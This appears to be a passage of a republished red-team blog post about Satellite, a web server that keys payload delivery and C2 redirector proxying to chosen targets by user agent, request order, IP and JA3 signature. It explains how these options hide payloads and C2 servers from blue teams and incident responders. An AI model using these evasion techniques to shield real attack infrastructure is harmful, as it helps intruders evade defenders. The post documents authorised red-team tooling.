mentioned, a large focus of the project was to make traffic keying easy to set up. This extends from usage to installation. The easiest installation method is to use the Debian software package format (.deb) on a Debian based system, which only requires downloading the file and using dpkg to install it. You can use the Installation wiki page to learn how to install Satellite on non-Debian systems. Route Configuration In Satellite, a route is the page requested by the user. The content of a route can be configured in the same way one configures a route in Apache or Nginx: put a file in the server root. By default, Satellite uses /var/www/html as the directory to serve files from, but that can be changed in the server config. Once Satellite is installed and running, you can begin serving pages. The “.info” file is where the magic of Satellite happens. The “.info” file is a YAML file that specifies what special actions should happen when a file is requested. These actions can either be keying options to protect a payload from unwanted requests (a member from the blue team) or directives like on_failure which specifies what should happen to the request if the key does not match. In addition to serving files, operators can also use the same keying options for traffic redirection using the proxy option. There is a special file in the server_root called proxy.yml which allows users to make a list of routes they’d like to proxy without having to create a dummy file. The proxy file works the same as a normal “.info” file, so the keying options that work on a payload also work with proxying. See the proxy example on GitHub for an in-depth explanation. I’ll go over a few keying options to solidify the point. First, the serve option allows operators to specify how many times they’d like for a file to be served before it’s inaccessible. This is a useful option when a payload only has one target. When the target downloads the file, the payload is no longer accessible through the web server. Next, is blacklist_useragents. As the name implies, one can blacklist User Agents from accessing a payload. The field matches a regular expression, so an operator can estimate blocking Linux clients by using: blacklist_useragents: - *Linux* Next, and maybe the most important, is on_failure. This option specifies what happens when a request fails to match a key. I’ll go more in-depth about on_failure in the Server Configuration section. Prereq Directive Next, the prereq directive is a really simple way to force requesters to access a set of paths before accessing another. This is useful when an operator uses ClickOnce for initial access. The ClickOnce application will first request the path /<name>/tracker.jpg before accessing ClickOnce.application. Using the prereq directive, an operator is able to deny access to CickOnce.application if they have not requested /<name>/tracker.jpg. For a simple example, if an operator knows their payload will request /a.jpeg and /metadata.json before it finally requests /payload, the operator can use the contents of the following file, payload.info, to only serve /payload once /a.jpeg and /metadata.json have been requested: prereq: - /a.jpeg - /metadata.json The example in the wiki shows how an operator can stack prereqs to force users to request one path after another. There are many ways this could be implemented, so understanding how it works is important. First, Satellite tracks users based on IP addresses since cookies may not be obeyed by the client. This means that if requesters with the same external IP are requesting pages, Satellite could fail to serve the payload even if one user requested each page in order. Second, the requests are also matched consecutively limited by the number of paths in the prereq list. This means that if the prereq directive states “access /one then access /two before accessing /payload”, but the user requests “/three, /one, /two, /payload,” Satellite will serve the payload. Using the same example, Satellite will not serve the request “/two, /one, /payload.” Testing this technique doesn’t work very well on browsers (especially Chrome) because requests are typically performed multiple times for preemptive rendering and caching reasons. authorized_ja3 Last, authorized_ja3 only allows specific JA3 signatures to access the payload. In my opinion, this is less useful for payload hosting unless you do intelligence gathering beforehand, but is extremely powerful for redirector proxying. JA3 signatures could stay the same between C2 agents unless it uses the operating system’s HTTP library for making calls and therefore presents varying JA3 signatures. In the case of static C2 agent JA3 signatures, you can key a Satellite route to only communicate with requestors that match a predefined C2 agent’s JA3 signature. This technique is useful to hide characteristics of a backend C2 server and the true purpose of a configured proxy route. For example, during an ongoing IR investigation, an incident responder could pull their proxy\netflow data from your C2 channel and mimic a request to the redirector’s configured route. However, unless they can also identify and replicate arbitrary JA3 signatures (ja3transport), they will not be able to directly interact with the backend C2 server — hiding the true nature of a route and preventing C2 server fingerprinting. Global Conditions If an operator has a list of keys they know they want to use for every operation, global conditions can be applied. In the /etc/satellite/conditions/ directory, files will be combined and applied to all Satellite requests. An example and deeper explanation can be found on the wiki. There are many more options to check out like authorized_countries, prereq, and blacklist_iprange which are listed on the Route Configuration wiki page. Server Configuration Out of the box, there is no required configuration in order to start serving pages. Satellite looks in three places to find server configuration: $HOME/.config/satellite/config.yml, $HOME/.satellite/config.yml, and /etc/satellite/config.yml. Once a valid configuration file is found, it validates the configuration settings and starts the server. Satellite’s server configuration options will be familiar if you’ve used other web servers like Apache or Nginx. For example, the default index, the listening port, and the server header are configurable. I’ll mention two things which are a bit different than normal web servers. The not_found option has either the subkey of redirect or render. The redirect option will perform a “301 redirect” to a specified site while the render option will perform a “200 OK” render of the page specified. The not_found option is also the default catch-all when a route does not match a request but does not specify a not_found option itself. Example Here is a video of how to use Satellite to key a payload. Source: https://posts.specterops.io/satellite-a-payload-and-proxy-service-for-red-team-operations-aa4500d3d970
    1 point
×
×
  • Create New...